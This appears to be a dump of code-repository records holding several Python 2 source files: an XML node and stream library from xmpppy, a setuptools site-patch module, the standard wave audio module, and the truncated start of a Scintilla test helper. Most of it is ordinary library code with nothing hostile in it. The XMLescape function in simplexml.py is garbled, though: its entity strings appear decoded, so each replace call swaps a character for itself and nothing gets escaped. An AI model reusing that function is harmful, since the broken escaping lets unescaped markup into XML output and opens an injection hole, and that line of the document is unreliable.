repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
yqm/sl4a | python-build/python-libs/xmpppy/xmpp/simplexml.py | 198 | 22791 | ## simplexml.py based on Mattew Allum's xmlstream.py
##
## Copyright (C) 2003-2005 Alexey "Snake" Nezhdanov
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
# $Id: simplexml.py,v 1.34 2009/03/03 10:24:02 normanr Exp $
"""Simplexml module provides xmpppy library with all needed tools to handle XML nodes and XML streams.
I'm personally using it in many other separate projects. It is designed to be as standalone as possible."""
import xml.parsers.expat
def XMLescape(txt):
"""Returns provided string with symbols & < > " replaced by their respective XML entities."""
# replace also FORM FEED and ESC, because they are not valid XML chars
return txt.replace("&", "&").replace("<", "<").replace(">", ">").replace('"', """).replace(u'\x0C', "").replace(u'\x1B', "")
ENCODING='utf-8'
def ustr(what):
"""Converts object "what" to unicode string using it's own __str__ method if accessible or unicode method otherwise."""
if isinstance(what, unicode): return what
try: r=what.__str__()
except AttributeError: r=str(what)
if not isinstance(r, unicode): return unicode(r,ENCODING)
return r
class Node(object):
""" Node class describes syntax of separate XML Node. It have a constructor that permits node creation
from set of "namespace name", attributes and payload of text strings and other nodes.
It does not natively support building node from text string and uses NodeBuilder class for that purpose.
After creation node can be mangled in many ways so it can be completely changed.
Also node can be serialised into string in one of two modes: default (where the textual representation
of node describes it exactly) and "fancy" - with whitespace added to make indentation and thus make
result more readable by human.
Node class have attribute FORCE_NODE_RECREATION that is defaults to False thus enabling fast node
replication from the some other node. The drawback of the fast way is that new node shares some
info with the "original" node that is changing the one node may influence the other. Though it is
rarely needed (in xmpppy it is never needed at all since I'm usually never using original node after
replication (and using replication only to move upwards on the classes tree).
"""
FORCE_NODE_RECREATION=0
def __init__(self, tag=None, attrs={}, payload=[], parent=None, nsp=None, node_built=False, node=None):
""" Takes "tag" argument as the name of node (prepended by namespace, if needed and separated from it
by a space), attrs dictionary as the set of arguments, payload list as the set of textual strings
and child nodes that this node carries within itself and "parent" argument that is another node
that this one will be the child of. Also the __init__ can be provided with "node" argument that is
either a text string containing exactly one node or another Node instance to begin with. If both
"node" and other arguments is provided then the node initially created as replica of "node"
provided and then modified to be compliant with other arguments."""
if node:
if self.FORCE_NODE_RECREATION and isinstance(node, Node):
node=str(node)
if not isinstance(node, Node):
node=NodeBuilder(node,self)
node_built = True
else:
self.name,self.namespace,self.attrs,self.data,self.kids,self.parent,self.nsd = node.name,node.namespace,{},[],[],node.parent,{}
for key in node.attrs.keys(): self.attrs[key]=node.attrs[key]
for data in node.data: self.data.append(data)
for kid in node.kids: self.kids.append(kid)
for k,v in node.nsd.items(): self.nsd[k] = v
else: self.name,self.namespace,self.attrs,self.data,self.kids,self.parent,self.nsd = 'tag','',{},[],[],None,{}
if parent:
self.parent = parent
self.nsp_cache = {}
if nsp:
for k,v in nsp.items(): self.nsp_cache[k] = v
for attr,val in attrs.items():
if attr == 'xmlns':
self.nsd[u''] = val
elif attr.startswith('xmlns:'):
self.nsd[attr[6:]] = val
self.attrs[attr]=attrs[attr]
if tag:
if node_built:
pfx,self.name = (['']+tag.split(':'))[-2:]
self.namespace = self.lookup_nsp(pfx)
else:
if ' ' in tag:
self.namespace,self.name = tag.split()
else:
self.name = tag
if isinstance(payload, basestring): payload=[payload]
for i in payload:
if isinstance(i, Node): self.addChild(node=i)
else: self.data.append(ustr(i))
def lookup_nsp(self,pfx=''):
ns = self.nsd.get(pfx,None)
if ns is None:
ns = self.nsp_cache.get(pfx,None)
if ns is None:
if self.parent:
ns = self.parent.lookup_nsp(pfx)
self.nsp_cache[pfx] = ns
else:
return 'http://www.gajim.org/xmlns/undeclared'
return ns
def __str__(self,fancy=0):
""" Method used to dump node into textual representation.
if "fancy" argument is set to True produces indented output for readability."""
s = (fancy-1) * 2 * ' ' + "<" + self.name
if self.namespace:
if not self.parent or self.parent.namespace!=self.namespace:
if 'xmlns' not in self.attrs:
s = s + ' xmlns="%s"'%self.namespace
for key in self.attrs.keys():
val = ustr(self.attrs[key])
s = s + ' %s="%s"' % ( key, XMLescape(val) )
s = s + ">"
cnt = 0
if self.kids:
if fancy: s = s + "\n"
for a in self.kids:
if not fancy and (len(self.data)-1)>=cnt: s=s+XMLescape(self.data[cnt])
elif (len(self.data)-1)>=cnt: s=s+XMLescape(self.data[cnt].strip())
if isinstance(a, Node):
s = s + a.__str__(fancy and fancy+1)
elif a:
s = s + a.__str__()
cnt=cnt+1
if not fancy and (len(self.data)-1) >= cnt: s = s + XMLescape(self.data[cnt])
elif (len(self.data)-1) >= cnt: s = s + XMLescape(self.data[cnt].strip())
if not self.kids and s.endswith('>'):
s=s[:-1]+' />'
if fancy: s = s + "\n"
else:
if fancy and not self.data: s = s + (fancy-1) * 2 * ' '
s = s + "</" + self.name + ">"
if fancy: s = s + "\n"
return s
def getCDATA(self):
""" Serialise node, dropping all tags and leaving CDATA intact.
That is effectively kills all formatiing, leaving only text were contained in XML.
"""
s = ""
cnt = 0
if self.kids:
for a in self.kids:
s=s+self.data[cnt]
if a: s = s + a.getCDATA()
cnt=cnt+1
if (len(self.data)-1) >= cnt: s = s + self.data[cnt]
return s
def addChild(self, name=None, attrs={}, payload=[], namespace=None, node=None):
""" If "node" argument is provided, adds it as child node. Else creates new node from
the other arguments' values and adds it as well."""
if 'xmlns' in attrs:
raise AttributeError("Use namespace=x instead of attrs={'xmlns':x}")
if node:
newnode=node
node.parent = self
else: newnode=Node(tag=name, parent=self, attrs=attrs, payload=payload)
if namespace:
newnode.setNamespace(namespace)
self.kids.append(newnode)
self.data.append(u'')
return newnode
def addData(self, data):
""" Adds some CDATA to node. """
self.data.append(ustr(data))
self.kids.append(None)
def clearData(self):
""" Removes all CDATA from the node. """
self.data=[]
def delAttr(self, key):
""" Deletes an attribute "key" """
del self.attrs[key]
def delChild(self, node, attrs={}):
""" Deletes the "node" from the node's childs list, if "node" is an instance.
Else deletes the first node that have specified name and (optionally) attributes. """
if not isinstance(node, Node): node=self.getTag(node,attrs)
self.kids[self.kids.index(node)]=None
return node
def getAttrs(self):
""" Returns all node's attributes as dictionary. """
return self.attrs
def getAttr(self, key):
""" Returns value of specified attribute. """
try: return self.attrs[key]
except: return None
def getChildren(self):
""" Returns all node's child nodes as list. """
return self.kids
def getData(self):
""" Returns all node CDATA as string (concatenated). """
return ''.join(self.data)
def getName(self):
""" Returns the name of node """
return self.name
def getNamespace(self):
""" Returns the namespace of node """
return self.namespace
def getParent(self):
""" Returns the parent of node (if present). """
return self.parent
def getPayload(self):
""" Return the payload of node i.e. list of child nodes and CDATA entries.
F.e. for "<node>text1<nodea/><nodeb/> text2</node>" will be returned list:
['text1', <nodea instance>, <nodeb instance>, ' text2']. """
ret=[]
for i in range(max(len(self.data),len(self.kids))):
if i < len(self.data) and self.data[i]: ret.append(self.data[i])
if i < len(self.kids) and self.kids[i]: ret.append(self.kids[i])
return ret
def getTag(self, name, attrs={}, namespace=None):
""" Filters all child nodes using specified arguments as filter.
Returns the first found or None if not found. """
return self.getTags(name, attrs, namespace, one=1)
def getTagAttr(self,tag,attr):
""" Returns attribute value of the child with specified name (or None if no such attribute)."""
try: return self.getTag(tag).attrs[attr]
except: return None
def getTagData(self,tag):
""" Returns cocatenated CDATA of the child with specified name."""
try: return self.getTag(tag).getData()
except: return None
def getTags(self, name, attrs={}, namespace=None, one=0):
""" Filters all child nodes using specified arguments as filter.
Returns the list of nodes found. """
nodes=[]
for node in self.kids:
if not node: continue
if namespace and namespace!=node.getNamespace(): continue
if node.getName() == name:
for key in attrs.keys():
if key not in node.attrs or node.attrs[key]!=attrs[key]: break
else: nodes.append(node)
if one and nodes: return nodes[0]
if not one: return nodes
def iterTags(self, name, attrs={}, namespace=None):
""" Iterate over all children using specified arguments as filter. """
for node in self.kids:
if not node: continue
if namespace is not None and namespace!=node.getNamespace(): continue
if node.getName() == name:
for key in attrs.keys():
if key not in node.attrs or \
node.attrs[key]!=attrs[key]: break
else:
yield node
def setAttr(self, key, val):
""" Sets attribute "key" with the value "val". """
self.attrs[key]=val
def setData(self, data):
""" Sets node's CDATA to provided string. Resets all previous CDATA!"""
self.data=[ustr(data)]
def setName(self,val):
""" Changes the node name. """
self.name = val
def setNamespace(self, namespace):
""" Changes the node namespace. """
self.namespace=namespace
def setParent(self, node):
""" Sets node's parent to "node". WARNING: do not checks if the parent already present
and not removes the node from the list of childs of previous parent. """
self.parent = node
def setPayload(self,payload,add=0):
""" Sets node payload according to the list specified. WARNING: completely replaces all node's
previous content. If you wish just to add child or CDATA - use addData or addChild methods. """
if isinstance(payload, basestring): payload=[payload]
if add: self.kids+=payload
else: self.kids=payload
def setTag(self, name, attrs={}, namespace=None):
""" Same as getTag but if the node with specified namespace/attributes not found, creates such
node and returns it. """
node=self.getTags(name, attrs, namespace=namespace, one=1)
if node: return node
else: return self.addChild(name, attrs, namespace=namespace)
def setTagAttr(self,tag,attr,val):
""" Creates new node (if not already present) with name "tag"
and sets it's attribute "attr" to value "val". """
try: self.getTag(tag).attrs[attr]=val
except: self.addChild(tag,attrs={attr:val})
def setTagData(self,tag,val,attrs={}):
""" Creates new node (if not already present) with name "tag" and (optionally) attributes "attrs"
and sets it's CDATA to string "val". """
try: self.getTag(tag,attrs).setData(ustr(val))
except: self.addChild(tag,attrs,payload=[ustr(val)])
def has_attr(self,key):
""" Checks if node have attribute "key"."""
return key in self.attrs
def __getitem__(self,item):
""" Returns node's attribute "item" value. """
return self.getAttr(item)
def __setitem__(self,item,val):
""" Sets node's attribute "item" value. """
return self.setAttr(item,val)
def __delitem__(self,item):
""" Deletes node's attribute "item". """
return self.delAttr(item)
def __getattr__(self,attr):
""" Reduce memory usage caused by T/NT classes - use memory only when needed. """
if attr=='T':
self.T=T(self)
return self.T
if attr=='NT':
self.NT=NT(self)
return self.NT
raise AttributeError
class T:
""" Auxiliary class used to quick access to node's child nodes. """
def __init__(self,node): self.__dict__['node']=node
def __getattr__(self,attr): return self.node.getTag(attr)
def __setattr__(self,attr,val):
if isinstance(val,Node): Node.__init__(self.node.setTag(attr),node=val)
else: return self.node.setTagData(attr,val)
def __delattr__(self,attr): return self.node.delChild(attr)
class NT(T):
""" Auxiliary class used to quick create node's child nodes. """
def __getattr__(self,attr): return self.node.addChild(attr)
def __setattr__(self,attr,val):
if isinstance(val,Node): self.node.addChild(attr,node=val)
else: return self.node.addChild(attr,payload=[val])
DBG_NODEBUILDER = 'nodebuilder'
class NodeBuilder:
""" Builds a Node class minidom from data parsed to it. This class used for two purposes:
1. Creation an XML Node from a textual representation. F.e. reading a config file. See an XML2Node method.
2. Handling an incoming XML stream. This is done by mangling
the __dispatch_depth parameter and redefining the dispatch method.
You do not need to use this class directly if you do not designing your own XML handler."""
def __init__(self,data=None,initial_node=None):
""" Takes two optional parameters: "data" and "initial_node".
By default class initialised with empty Node class instance.
Though, if "initial_node" is provided it used as "starting point".
You can think about it as of "node upgrade".
"data" (if provided) feeded to parser immidiatedly after instance init.
"""
self.DEBUG(DBG_NODEBUILDER, "Preparing to handle incoming XML stream.", 'start')
self._parser = xml.parsers.expat.ParserCreate()
self._parser.StartElementHandler = self.starttag
self._parser.EndElementHandler = self.endtag
self._parser.CharacterDataHandler = self.handle_cdata
self._parser.StartNamespaceDeclHandler = self.handle_namespace_start
self._parser.buffer_text = True
self.Parse = self._parser.Parse
self.__depth = 0
self.__last_depth = 0
self.__max_depth = 0
self._dispatch_depth = 1
self._document_attrs = None
self._document_nsp = None
self._mini_dom=initial_node
self.last_is_data = 1
self._ptr=None
self.data_buffer = None
self.streamError = ''
if data:
self._parser.Parse(data,1)
def check_data_buffer(self):
if self.data_buffer:
self._ptr.data.append(''.join(self.data_buffer))
del self.data_buffer[:]
self.data_buffer = None
def destroy(self):
""" Method used to allow class instance to be garbage-collected. """
self.check_data_buffer()
self._parser.StartElementHandler = None
self._parser.EndElementHandler = None
self._parser.CharacterDataHandler = None
self._parser.StartNamespaceDeclHandler = None
def starttag(self, tag, attrs):
"""XML Parser callback. Used internally"""
self.check_data_buffer()
self._inc_depth()
self.DEBUG(DBG_NODEBUILDER, "DEPTH -> %i , tag -> %s, attrs -> %s" % (self.__depth, tag, `attrs`), 'down')
if self.__depth == self._dispatch_depth:
if not self._mini_dom :
self._mini_dom = Node(tag=tag, attrs=attrs, nsp = self._document_nsp, node_built=True)
else:
Node.__init__(self._mini_dom,tag=tag, attrs=attrs, nsp = self._document_nsp, node_built=True)
self._ptr = self._mini_dom
elif self.__depth > self._dispatch_depth:
self._ptr.kids.append(Node(tag=tag,parent=self._ptr,attrs=attrs, node_built=True))
self._ptr = self._ptr.kids[-1]
if self.__depth == 1:
self._document_attrs = {}
self._document_nsp = {}
nsp, name = (['']+tag.split(':'))[-2:]
for attr,val in attrs.items():
if attr == 'xmlns':
self._document_nsp[u''] = val
elif attr.startswith('xmlns:'):
self._document_nsp[attr[6:]] = val
else:
self._document_attrs[attr] = val
ns = self._document_nsp.get(nsp, 'http://www.gajim.org/xmlns/undeclared-root')
try:
self.stream_header_received(ns, name, attrs)
except ValueError, e:
self._document_attrs = None
raise ValueError(str(e))
if not self.last_is_data and self._ptr.parent:
self._ptr.parent.data.append('')
self.last_is_data = 0
def endtag(self, tag ):
"""XML Parser callback. Used internally"""
self.DEBUG(DBG_NODEBUILDER, "DEPTH -> %i , tag -> %s" % (self.__depth, tag), 'up')
self.check_data_buffer()
if self.__depth == self._dispatch_depth:
if self._mini_dom.getName() == 'error':
self.streamError = self._mini_dom.getChildren()[0].getName()
self.dispatch(self._mini_dom)
elif self.__depth > self._dispatch_depth:
self._ptr = self._ptr.parent
else:
self.DEBUG(DBG_NODEBUILDER, "Got higher than dispatch level. Stream terminated?", 'stop')
self._dec_depth()
self.last_is_data = 0
if self.__depth == 0: self.stream_footer_received()
def handle_cdata(self, data):
"""XML Parser callback. Used internally"""
self.DEBUG(DBG_NODEBUILDER, data, 'data')
if self.last_is_data:
if self.data_buffer:
self.data_buffer.append(data)
elif self._ptr:
self.data_buffer = [data]
self.last_is_data = 1
def handle_namespace_start(self, prefix, uri):
"""XML Parser callback. Used internally"""
self.check_data_buffer()
def DEBUG(self, level, text, comment=None):
""" Gets all NodeBuilder walking events. Can be used for debugging if redefined."""
def getDom(self):
""" Returns just built Node. """
self.check_data_buffer()
return self._mini_dom
def dispatch(self,stanza):
""" Gets called when the NodeBuilder reaches some level of depth on it's way up with the built
node as argument. Can be redefined to convert incoming XML stanzas to program events. """
def stream_header_received(self,ns,tag,attrs):
""" Method called when stream just opened. """
self.check_data_buffer()
def stream_footer_received(self):
""" Method called when stream just closed. """
self.check_data_buffer()
def has_received_endtag(self, level=0):
""" Return True if at least one end tag was seen (at level) """
return self.__depth <= level and self.__max_depth > level
def _inc_depth(self):
self.__last_depth = self.__depth
self.__depth += 1
self.__max_depth = max(self.__depth, self.__max_depth)
def _dec_depth(self):
self.__last_depth = self.__depth
self.__depth -= 1
def XML2Node(xml):
""" Converts supplied textual string into XML node. Handy f.e. for reading configuration file.
Raises xml.parser.expat.parsererror if provided string is not well-formed XML. """
return NodeBuilder(xml).getDom()
def BadXML2Node(xml):
""" Converts supplied textual string into XML node. Survives if xml data is cutted half way round.
I.e. "<html>some text <br>some more text". Will raise xml.parser.expat.parsererror on misplaced
tags though. F.e. "<b>some text <br>some more text</b>" will not work."""
return NodeBuilder(xml).getDom()
| apache-2.0 |
tuxfux-hlp-notes/python-batches | archieves/batch-56/modules/sheets/lib/python2.7/site-packages/setuptools/site-patch.py | 358 | 2418 | def __boot():
import sys, os, os.path
PYTHONPATH = os.environ.get('PYTHONPATH')
if PYTHONPATH is None or (sys.platform=='win32' and not PYTHONPATH):
PYTHONPATH = []
else:
PYTHONPATH = PYTHONPATH.split(os.pathsep)
pic = getattr(sys,'path_importer_cache',{})
stdpath = sys.path[len(PYTHONPATH):]
mydir = os.path.dirname(__file__)
#print "searching",stdpath,sys.path
for item in stdpath:
if item==mydir or not item:
continue # skip if current dir. on Windows, or my own directory
importer = pic.get(item)
if importer is not None:
loader = importer.find_module('site')
if loader is not None:
# This should actually reload the current module
loader.load_module('site')
break
else:
try:
import imp # Avoid import loop in Python >= 3.3
stream, path, descr = imp.find_module('site',[item])
except ImportError:
continue
if stream is None:
continue
try:
# This should actually reload the current module
imp.load_module('site',stream,path,descr)
finally:
stream.close()
break
else:
raise ImportError("Couldn't find the real 'site' module")
#print "loaded", __file__
known_paths = dict([(makepath(item)[1],1) for item in sys.path]) # 2.2 comp
oldpos = getattr(sys,'__egginsert',0) # save old insertion position
sys.__egginsert = 0 # and reset the current one
for item in PYTHONPATH:
addsitedir(item)
sys.__egginsert += oldpos # restore effective old position
d,nd = makepath(stdpath[0])
insert_at = None
new_path = []
for item in sys.path:
p,np = makepath(item)
if np==nd and insert_at is None:
# We've hit the first 'system' path entry, so added entries go here
insert_at = len(new_path)
if np in known_paths or insert_at is None:
new_path.append(item)
else:
# new path after the insert point, back-insert it
new_path.insert(insert_at, item)
insert_at += 1
sys.path[:] = new_path
if __name__=='site':
__boot()
del __boot
| gpl-3.0 |
kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/wave.py | 11 | 18582 | """Stuff to parse WAVE files.
Usage.
Reading WAVE files:
f = wave.open(file, 'r')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods read(), seek(), and close().
When the setpos() and rewind() methods are not used, the seek()
method is not necessary.
This returns an instance of a class with the following public methods:
getnchannels() -- returns number of audio channels (1 for
mono, 2 for stereo)
getsampwidth() -- returns sample width in bytes
getframerate() -- returns sampling frequency
getnframes() -- returns number of audio frames
getcomptype() -- returns compression type ('NONE' for linear samples)
getcompname() -- returns human-readable version of
compression type ('not compressed' linear samples)
getparams() -- returns a tuple consisting of all of the
above in the above order
getmarkers() -- returns None (for compatibility with the
aifc module)
getmark(id) -- raises an error since the mark does not
exist (for compatibility with the aifc module)
readframes(n) -- returns at most n frames of audio
rewind() -- rewind to the beginning of the audio stream
setpos(pos) -- seek to the specified position
tell() -- return the current position
close() -- close the instance (make it unusable)
The position returned by tell() and the position given to setpos()
are compatible and have nothing to do with the actual position in the
file.
The close() method is called automatically when the class instance
is destroyed.
Writing WAVE files:
f = wave.open(file, 'w')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods write(), tell(), seek(), and
close().
This returns an instance of a class with the following public methods:
setnchannels(n) -- set the number of channels
setsampwidth(n) -- set the sample width
setframerate(n) -- set the frame rate
setnframes(n) -- set the number of frames
setcomptype(type, name)
-- set the compression type and the
human-readable compression type
setparams(tuple)
-- set all parameters at once
tell() -- return current position in output file
writeframesraw(data)
-- write audio frames without pathing up the
file header
writeframes(data)
-- write audio frames and patch up the file header
close() -- patch up the file header and close the
output file
You should set the parameters before the first writeframesraw or
writeframes. The total number of frames does not need to be set,
but when it is set to the correct value, the header does not have to
be patched up.
It is best to first set all parameters, perhaps possibly the
compression type, and then write audio frames using writeframesraw.
When all frames have been written, either call writeframes('') or
close() to patch up the sizes in the header.
The close() method is called automatically when the class instance
is destroyed.
"""
import __builtin__
__all__ = ["open", "openfp", "Error"]
class Error(Exception):
pass
WAVE_FORMAT_PCM = 0x0001
_array_fmts = None, 'b', 'h', None, 'i'
import struct
import sys
from chunk import Chunk
def _byteswap3(data):
ba = bytearray(data)
ba[::3] = data[2::3]
ba[2::3] = data[::3]
return bytes(ba)
class Wave_read:
"""Variables used in this class:
These variables are available to the user though appropriate
methods of this class:
_file -- the open file with methods read(), close(), and seek()
set through the __init__() method
_nchannels -- the number of audio channels
available through the getnchannels() method
_nframes -- the number of audio frames
available through the getnframes() method
_sampwidth -- the number of bytes per audio sample
available through the getsampwidth() method
_framerate -- the sampling frequency
available through the getframerate() method
_comptype -- the AIFF-C compression type ('NONE' if AIFF)
available through the getcomptype() method
_compname -- the human-readable AIFF-C compression type
available through the getcomptype() method
_soundpos -- the position in the audio stream
available through the tell() method, set through the
setpos() method
These variables are used internally only:
_fmt_chunk_read -- 1 iff the FMT chunk has been read
_data_seek_needed -- 1 iff positioned correctly in audio
file for readframes()
_data_chunk -- instantiation of a chunk class for the DATA chunk
_framesize -- size of one frame in the file
"""
def initfp(self, file):
self._convert = None
self._soundpos = 0
self._file = Chunk(file, bigendian = 0)
if self._file.getname() != 'RIFF':
raise Error, 'file does not start with RIFF id'
if self._file.read(4) != 'WAVE':
raise Error, 'not a WAVE file'
self._fmt_chunk_read = 0
self._data_chunk = None
while 1:
self._data_seek_needed = 1
try:
chunk = Chunk(self._file, bigendian = 0)
except EOFError:
break
chunkname = chunk.getname()
if chunkname == 'fmt ':
self._read_fmt_chunk(chunk)
self._fmt_chunk_read = 1
elif chunkname == 'data':
if not self._fmt_chunk_read:
raise Error, 'data chunk before fmt chunk'
self._data_chunk = chunk
self._nframes = chunk.chunksize // self._framesize
self._data_seek_needed = 0
break
chunk.skip()
if not self._fmt_chunk_read or not self._data_chunk:
raise Error, 'fmt chunk and/or data chunk missing'
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, basestring):
f = __builtin__.open(f, 'rb')
self._i_opened_the_file = f
# else, assume it is an open file object already
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def __del__(self):
self.close()
#
# User visible methods.
#
def getfp(self):
return self._file
def rewind(self):
self._data_seek_needed = 1
self._soundpos = 0
def close(self):
self._file = None
file = self._i_opened_the_file
if file:
self._i_opened_the_file = None
file.close()
def tell(self):
return self._soundpos
def getnchannels(self):
return self._nchannels
def getnframes(self):
return self._nframes
def getsampwidth(self):
return self._sampwidth
def getframerate(self):
return self._framerate
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def getmarkers(self):
return None
def getmark(self, id):
raise Error, 'no marks'
def setpos(self, pos):
if pos < 0 or pos > self._nframes:
raise Error, 'position not in range'
self._soundpos = pos
self._data_seek_needed = 1
def readframes(self, nframes):
if self._data_seek_needed:
self._data_chunk.seek(0, 0)
pos = self._soundpos * self._framesize
if pos:
self._data_chunk.seek(pos, 0)
self._data_seek_needed = 0
if nframes == 0:
return ''
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
# unfortunately the fromfile() method does not take
# something that only looks like a file object, so
# we have to reach into the innards of the chunk object
import array
chunk = self._data_chunk
data = array.array(_array_fmts[self._sampwidth])
assert data.itemsize == self._sampwidth
nitems = nframes * self._nchannels
if nitems * self._sampwidth > chunk.chunksize - chunk.size_read:
nitems = (chunk.chunksize - chunk.size_read) // self._sampwidth
data.fromfile(chunk.file.file, nitems)
# "tell" data chunk how much was read
chunk.size_read = chunk.size_read + nitems * self._sampwidth
# do the same for the outermost chunk
chunk = chunk.file
chunk.size_read = chunk.size_read + nitems * self._sampwidth
data.byteswap()
data = data.tostring()
else:
data = self._data_chunk.read(nframes * self._framesize)
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
if self._convert and data:
data = self._convert(data)
self._soundpos = self._soundpos + len(data) // (self._nchannels * self._sampwidth)
return data
#
# Internal methods.
#
def _read_fmt_chunk(self, chunk):
wFormatTag, self._nchannels, self._framerate, dwAvgBytesPerSec, wBlockAlign = struct.unpack('<HHLLH', chunk.read(14))
if wFormatTag == WAVE_FORMAT_PCM:
sampwidth = struct.unpack('<H', chunk.read(2))[0]
self._sampwidth = (sampwidth + 7) // 8
else:
raise Error, 'unknown format: %r' % (wFormatTag,)
self._framesize = self._nchannels * self._sampwidth
self._comptype = 'NONE'
self._compname = 'not compressed'
class Wave_write:
"""Variables used in this class:
These variables are user settable through appropriate methods
of this class:
_file -- the open file with methods write(), close(), tell(), seek()
set through the __init__() method
_comptype -- the AIFF-C compression type ('NONE' in AIFF)
set through the setcomptype() or setparams() method
_compname -- the human-readable AIFF-C compression type
set through the setcomptype() or setparams() method
_nchannels -- the number of audio channels
set through the setnchannels() or setparams() method
_sampwidth -- the number of bytes per audio sample
set through the setsampwidth() or setparams() method
_framerate -- the sampling frequency
set through the setframerate() or setparams() method
_nframes -- the number of audio frames written to the header
set through the setnframes() or setparams() method
These variables are used internally only:
_datalength -- the size of the audio samples written to the header
_nframeswritten -- the number of frames actually written
_datawritten -- the size of the audio samples actually written
"""
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, basestring):
f = __builtin__.open(f, 'wb')
self._i_opened_the_file = f
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def initfp(self, file):
self._file = file
self._convert = None
self._nchannels = 0
self._sampwidth = 0
self._framerate = 0
self._nframes = 0
self._nframeswritten = 0
self._datawritten = 0
self._datalength = 0
self._headerwritten = False
def __del__(self):
self.close()
#
# User visible methods.
#
def setnchannels(self, nchannels):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if nchannels < 1:
raise Error, 'bad # of channels'
self._nchannels = nchannels
def getnchannels(self):
if not self._nchannels:
raise Error, 'number of channels not set'
return self._nchannels
def setsampwidth(self, sampwidth):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if sampwidth < 1 or sampwidth > 4:
raise Error, 'bad sample width'
self._sampwidth = sampwidth
def getsampwidth(self):
if not self._sampwidth:
raise Error, 'sample width not set'
return self._sampwidth
def setframerate(self, framerate):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if framerate <= 0:
raise Error, 'bad frame rate'
self._framerate = framerate
def getframerate(self):
if not self._framerate:
raise Error, 'frame rate not set'
return self._framerate
def setnframes(self, nframes):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
self._nframes = nframes
def getnframes(self):
return self._nframeswritten
def setcomptype(self, comptype, compname):
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
if comptype not in ('NONE',):
raise Error, 'unsupported compression type'
self._comptype = comptype
self._compname = compname
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def setparams(self, params):
nchannels, sampwidth, framerate, nframes, comptype, compname = params
if self._datawritten:
raise Error, 'cannot change parameters after starting to write'
self.setnchannels(nchannels)
self.setsampwidth(sampwidth)
self.setframerate(framerate)
self.setnframes(nframes)
self.setcomptype(comptype, compname)
def getparams(self):
if not self._nchannels or not self._sampwidth or not self._framerate:
raise Error, 'not all parameters set'
return self._nchannels, self._sampwidth, self._framerate, \
self._nframes, self._comptype, self._compname
def setmark(self, id, pos, name):
raise Error, 'setmark() not supported'
def getmark(self, id):
raise Error, 'no marks'
def getmarkers(self):
return None
def tell(self):
return self._nframeswritten
def writeframesraw(self, data):
self._ensure_header_written(len(data))
nframes = len(data) // (self._sampwidth * self._nchannels)
if self._convert:
data = self._convert(data)
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
import array
a = array.array(_array_fmts[self._sampwidth])
a.fromstring(data)
data = a
assert data.itemsize == self._sampwidth
data.byteswap()
data.tofile(self._file)
self._datawritten = self._datawritten + len(data) * self._sampwidth
else:
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
self._file.write(data)
self._datawritten = self._datawritten + len(data)
self._nframeswritten = self._nframeswritten + nframes
def writeframes(self, data):
self.writeframesraw(data)
if self._datalength != self._datawritten:
self._patchheader()
def close(self):
try:
if self._file:
self._ensure_header_written(0)
if self._datalength != self._datawritten:
self._patchheader()
self._file.flush()
finally:
self._file = None
file = self._i_opened_the_file
if file:
self._i_opened_the_file = None
file.close()
#
# Internal methods.
#
def _ensure_header_written(self, datasize):
if not self._headerwritten:
if not self._nchannels:
raise Error, '# channels not specified'
if not self._sampwidth:
raise Error, 'sample width not specified'
if not self._framerate:
raise Error, 'sampling rate not specified'
self._write_header(datasize)
def _write_header(self, initlength):
assert not self._headerwritten
self._file.write('RIFF')
if not self._nframes:
self._nframes = initlength / (self._nchannels * self._sampwidth)
self._datalength = self._nframes * self._nchannels * self._sampwidth
self._form_length_pos = self._file.tell()
self._file.write(struct.pack('<L4s4sLHHLLHH4s',
36 + self._datalength, 'WAVE', 'fmt ', 16,
WAVE_FORMAT_PCM, self._nchannels, self._framerate,
self._nchannels * self._framerate * self._sampwidth,
self._nchannels * self._sampwidth,
self._sampwidth * 8, 'data'))
self._data_length_pos = self._file.tell()
self._file.write(struct.pack('<L', self._datalength))
self._headerwritten = True
def _patchheader(self):
assert self._headerwritten
if self._datawritten == self._datalength:
return
curpos = self._file.tell()
self._file.seek(self._form_length_pos, 0)
self._file.write(struct.pack('<L', 36 + self._datawritten))
self._file.seek(self._data_length_pos, 0)
self._file.write(struct.pack('<L', self._datawritten))
self._file.seek(curpos, 0)
self._datalength = self._datawritten
def open(f, mode=None):
if mode is None:
if hasattr(f, 'mode'):
mode = f.mode
else:
mode = 'rb'
if mode in ('r', 'rb'):
return Wave_read(f)
elif mode in ('w', 'wb'):
return Wave_write(f)
else:
raise Error, "mode must be 'r', 'rb', 'w', or 'wb'"
openfp = open # B/W compatibility
| gpl-3.0 |
cuavas/bgfx | 3rdparty/scintilla/test/ScintillaCallable.py | 68 | 4970 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import ctypes, os, sys
from ctypes import c_int, c_ulong, c_char_p, c_wchar_p, c_ushort, c_uint, c_long
class TEXTRANGE(ctypes.Structure):
_fields_= (\
('cpMin', c_long),
('cpMax', c_long),
('lpstrText', ctypes.POINTER(ctypes.c_char)),
)
class FINDTEXT(ctypes.Structure):
